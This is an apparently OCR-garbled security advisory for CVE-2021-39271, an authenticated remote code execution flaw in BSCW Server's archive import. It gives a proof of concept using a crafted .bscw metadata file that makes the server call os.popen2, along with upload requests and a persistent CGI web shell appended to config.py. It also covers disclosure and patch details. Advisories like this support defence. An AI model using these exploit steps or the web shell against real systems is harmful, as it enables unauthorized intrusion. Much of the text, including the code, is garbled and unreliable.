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BSCW Server Remote Code Execution

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BSCW Server versions 7.4.2 and below, 7.3.2 and below, 5.2.3 and below, 5.1.9 and below, and 5.0.11 and below suffer from an authenticated remote code execution vulnerability.

 tags | exploit, remote, code execution

 advisories | CVE-2021-39271

 SHA-256 | 49197fb2cfb022676fde90bcac4d9316f667e46b26bff72013da082a88e9e04f

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product: vulnerable version: fixed version: CVE number: impact: homepage: found: by:	5.0.12, 5.1.10, ! CVE-2021-39271	0.11, <=5.1.9, 5.2.4, 7.3.3, 7 de/classic/	<=5.2.3, <=7. .4.3	3.2, <=7.4.	.2	
	An integrated pa: Europe Asia 1	rt of SEC Consu North America	lt, an Atos c	ompany		
	https://www.sec-	consult.com				
Vendor description:						
"A versatile system fo	r any field of ap	oplication				
BSCW Classic is in use offers the right solut proven system has been numerous companies for	ion for every tar supporting infor	sk. Turn your i	deas into rea	lity! Our	at	
Source: https://www.bs	cw.de/en/classic	′				
Business recommendatio	n: 					
The vendor provides a be installed immediate	patched version : ly.	for the affecte	d products wh	ich should		
Vulnerability overview	/description:					
1) Authenticated RCE The application sllows archives ('ZIP', 'tar' extraction process a s the files created duri ('class'), which is la create the desired obj the class/function whi arbitrary 'Python' fun parameters provided, w (a element from the me	, `RFC822') and of pecial file ('.b. ng extraction. The ter used to insteact. As there is ch can be called ction. During the here the first is	extract them on scw') is proces his metadata fi antiate a class no allow-list , it is possible function call s controlled by	the server. sed to attach le contains a /call a funct implemented t e to call an there are tw	During the metadata to attribute ion to o limit	:0	
Proof of concept:	reate an archive scw ./*	with a malicio	us `.bscw` fi	le.		
type="text/html; chars <bscw:descripti <bscw doc:mimet<="" td=""><td>EM "http://bscw.« w:80H.sec" serve: w_doc="http://bse w.de/bscw/elemen! 30343.92" creato:</td><td>r="http://bscw. cw.de/bscw/elem ts/0.1/" > r="admin" id="2 "<class functio<br="">ption> t</class></td></bscw><td>local" timest ents/0.1/doc/ 14" mtime="16 N to call>" > etype></td><td>-</td><td>530T123242Z" pathsep=</td><td>\"\\"></td></bscw:descripti 	EM "http://bscw.« w:80H.sec" serve: w_doc="http://bse w.de/bscw/elemen! 30343.92" creato:	r="http://bscw. cw.de/bscw/elem ts/0.1/" > r="admin" id="2 " <class functio<br="">ption> t</class>	local" timest ents/0.1/doc/ 14" mtime="16 N to call>" > etype>	-	530T123242Z" pathsep=	\"\\">
Then the archive can b	e uploaded to a :	Folder (OID: 26	7), where the	user		
has write access to: 	dono ain Ummp/1					
Host: bscw.local:8080 User-Agent: Mozilla/5.			Gecko/2010010	1 Firefox/7	78.0	
Accept: */* Accept-Language: en-US Accept-Encoding: gzip, Content-Type: applicat Content-Length: 1559 DNT: 1	deflate					
DNT: 1 Connection: close Cookie: bscw_auth=" <us< td=""><td>ER_AUTH_COOKIE>"</td><td></td><td></td><td></td><td></td><td></td></us<>	ER_AUTH_COOKIE>"					
PK						
After uploading the ar created file object (G	ID: 1179):			for the new		
Host: bscw.local:8080 User-Agent: Mozilla/5. Accept: text/html,appl Accept-Language: en-US Accept-Encoding: gzip, DNT: 1	0 (X11; Linux x8) ication/xhtml+xm; ,en;q=0.5	6 64; rv:78.0)	Gecko/2010010	l Firefox/7 e/webp,*/*;	78.0 q=0.8	
Connection: close Referer: http://bscw.l Cookie: bscw_auth=" <us Upgrade-Insecure-Reque</us 	ER_AUTH_COOKIE>"	cw.cgi/267				
During the extraction and called.	the function from			ocated		
def createArtifact(sel	f, request, tree, for user and add artifact, oldid)	d to target				
* ····						
# Locating the cla	ss/function					

```
# klass = metadata 'class' attribute
klass_tuple = klass.split('.')
klass_name = klass_tuple[(-1)]
klass_modul = ('.').join(klass_tuple[:-1])
          klass_modul = _import ('bscw').module(klass_modul)
except ImportError as ie:
log_arc.warning('ImportError: % ', str(ie))
klass = 'bscw.core.cl_folder.Folder'
modul = None
           if modul and hasattr(modul, klass_name):
    constructor = getattr(modul, klass_name)
          else:
constructor = None
           # Large if else construct for handling different known classes
if klass == 'bscw.core.cl_folder.Folder' or bscw_mml and klass in FOLDER_CLASSES:
log_arc.debug('createAttifact: create Folder (for %s)', klass_name)
lname = legalized_name(Folder, name)
          # If klass is unknown the following code is executed
# name = metadata object element 'bscw.name'
# user = <br/>bscw.core.cl_user.User>(logged in user)<br/>if constructor:
                   constructor: assert callable(constructor), 'artifact constructor is callable'
                  artifact = constructor(name, user)
lname = artifact.set_name(name, autolegalize=True)
except Exception as e:
    return self.failed(klass, e, fname=fname)
   o exploit this code we need a function which can be invoked like:
  "GADGET (arg. 1 str. arg2: bscw.core.cl_user.loser)".
Fortunately "BSGW Classic" requires "Python 2.X", which has the function "os.popen2".
  os.popen2(cmd[, mode[, bufsize]])
            Execute cmd as a sub-process and return the file objects (child_stdin, child_stdout).
            Deprecated since version 2.6: This function is obsolete. Use the subprocess module. Check especially the Replacing Older Functions with the subprocess Module section.
            Availability: Unix, Windows.
            New in version 2.0.
The first parameter is the command line which is executed in a shell context. The second parameter is "mode" which should be "w"" or "r"", but it falls back to the default if the type is not correct (in contrary to "os.popen').

Typenon 2.7.18 (default, Apr 20 2021, 17:39:59)

Type "help", "copyright", "credits" or "license" for more information.

>>> !mmort os.
[GCC 10.2.1 Z0210110] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.popen("whosmi", dict())
Traccheck (most recent call last):
File "scaffun", line l, in Condule>
TypeError: popen() argument 2 must be string, not dict
>>> os.popen("whosmi", dict())
(<open file '<fdopen>', mode 'wb' at 0x7ff98f42c780>, <open file '<fdopen>', mode 'rb' at 0x7ff98f42c660>)
>>>
Providing `os.popen2` as value of the `class` attribute and 
'touch /tmp/foobar_poc.txt' as the value `bscw:name` element, the following 
code is executed:
 os.popen2("touch /tmp/foobar_poc.txt", bscw.core.cl_user.User("UID"))
root@888df0c0b5f0:/opt/bscw/srv/bscw.local# ls -la /tmp/*poc*
-rw-rw---- 1 www-data bscw 0 Jul 3 07:43 /tmp/foobar_poc.txt
But currently this is a blind RCE, because the result of the call is assigned to `artiface` and the method `.set_name` is called on the returned `tuple` (see above code).
 The extraction generates the following log entries:
2021-06-24 14:33:53 clartifact on archive_import 2464 DBBUG Artifact.on_archive_import():
bscw.core.cl_document.Document#1142
2021-06-24 14:33:53 bs_extract createArtifact 80 DEBUG createArtifact for node: ArchiveNode[#3]
conditional contents of the path continued and archive archiveNode createArtifact for node: ArchiveNode[#3]
contents of the path con
   O21-06-24 14:33:33 bs_extract createArtifact 178 DEBUG createArtifact: <as.popen2> 'touch /tmp/foobar.txt'
O21-06-24 14:33:33 bs_extract createArtifact 178 DEBUG createArtifact: kmodul-os kname-popen2 modul-<module os from '/usr/lib/python2.7/os.pye'> constructor-function popen2 at OxTIZ27dI3930>
O21-06-24 14:33:33 bs_extract failed 366 ERMOR createArtifact: "os.popen2" failed: 'tuple' object has o attribute 'set_name' (touch /tmp/foobar.txt)
 Simple persistent shell (CGI mode)
 To allow the attacker to execute commands and get the output of it, the file `<bscw_install>/conf/config.py` can be overwritten.
 The initial permissions of this file look like (user: `bscw`, group: `bscw`):
root8888df0c0b5f0:/opt/bscw/srv/bscw.local# 1s -la conf/config.py -rw-rw-r- 1 bscw bscw 83899 Jul 3 10:50 conf/config.py
In the normal setup, Apache is used to run the 'bscw.cgi' script as its own 
user 'www-data'. But fortunately the 'bscw.cgi' binary has the 'SGID' flag set, 
which sets the 'effective GID' to 'bscw'. This allows us to overwrite this 
file.
   riie.

coot8888df0c0b5f0:/opt/bscw/srv/bscw.local# 1s -la var/www/bscw.cgi
  The following simple shell can be installed on the system:
import os
e key = os.environ.get("HTTP_BSCW K", "")
e_cmd = os.environ.get("HTTP_BSCW C", "")
if e_key == "(KEY)" and e_cmd:
    try:
        print "Content-Type: text/plain\n"
        import sys, subprocess
except Exception as e:
        print "content-Type: text/plain\n"
        import sys, subprocess
except Exception as e:
        print e
        sys.exit(0)
 This can be done with the shown command:
     cho "<BASE64 encoded python shell code>" | base64 -d >> ./conf/config.py
he response of the executed command "ls -la" is directly contained in the seponse of the web-server.
```

 Spoof (2.166)
 SUSE (1.444)

 SQL Injection (16,102)
 Ubuntu (8,199)

 TCP (2.379)
 UNIX (9,159)

 Trojan (886)
 UnixWare (185)

 UDP (876)
 Windows (6,511)

 Virus (862)
 Other

 Vulnerability (31,136)
 Web (9,365)

 Whitepaper (3,729)
 Whitepaper (3,729)

X86 (946) XSS (17 494)

```
HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 13:13:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Yary: Accept-Encoding User-Agent
Content-Length: 806
Connection: close
Content-Type: text/plain
Content-Type: text/plain

total 36

drawn-x-x-k l bacw bacw 4096 Jul 3 08:41.

drawn-x-x-k l bacw bacw 4096 Jul 8 22:07 .

1rwxrwxrwx l bacw bacw 4096 Jul 18 22:07 .

1rwxrwxrwx l bacw bacw 4096 Jul 18 22:07 20:190717-1636-2b48861 -> /opt/bacw/lib/bacw-5.2.3-2b48861-

py27/Dacw/resources

drwxrw-x-x 4 bacw bacw 4096 Jul 18 22:07 bacw.cgi

-rw------ 1 bacw bacw 2966 Jul 18 22:07 bacw.cgi

-rw------ 1 bacw bacw 2966 Jul 18 22:07 bacw.cgi

-rw----- 1 bacw bacw 3936 Jul 18 22:07 index.html.de

-rw------ 1 bacw bacw 3936 Jul 18 22:07 index.html.er

-rw------ 1 bacw bacw 3938 Jul 18 22:07 index.html.er

-rw------ 1 bacw bacw 3938 Jul 18 22:07 index.html.er

-rw------ 1 bacw bacw 3938 Jul 18 22:07 raceback.html.er

-rw------ 1 bacw bacw 3938 Jul 18 22:07 raceback.html.er

-rw------ 1 bacw bacw 32 Jul 18 22:07 raceback.html.er

-rw------ 1 bacw bacw 32 Jul 18 22:07 raceback.html.er
   BSCW Classic 5.2.3 was used to find the vulnerability.
The vendor confirmed that following versions also affected by the vulnerability
   BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
   Vendor contact timeline:
 2021-07-03: Vendor contacted via security0, asked for a PGP Key / SMIME certificate to encrypt communication 2021-07-06: Wendor contacted via supported, asked for a PGP Key / SMIME certificate to encrypt communication 2021-07-06: Wendor provided contact and PGP Key, Sent report to vendor 2021-07-06: Vendor confirmed the issue and is working on a patch 2021-08-19 Wendor provided a horfix 2021-08-19 Wendor provided a horfix 2021-08-27: Coordinated release of security advisory.
   Solution:
   The vendor provides a patched version for the affected and supported products which should be installed immediately.
   Additional information can be viewed at the vendor's support page:
   Workaround:
  None
   https://sec-consult.com/vulnerability-lab/
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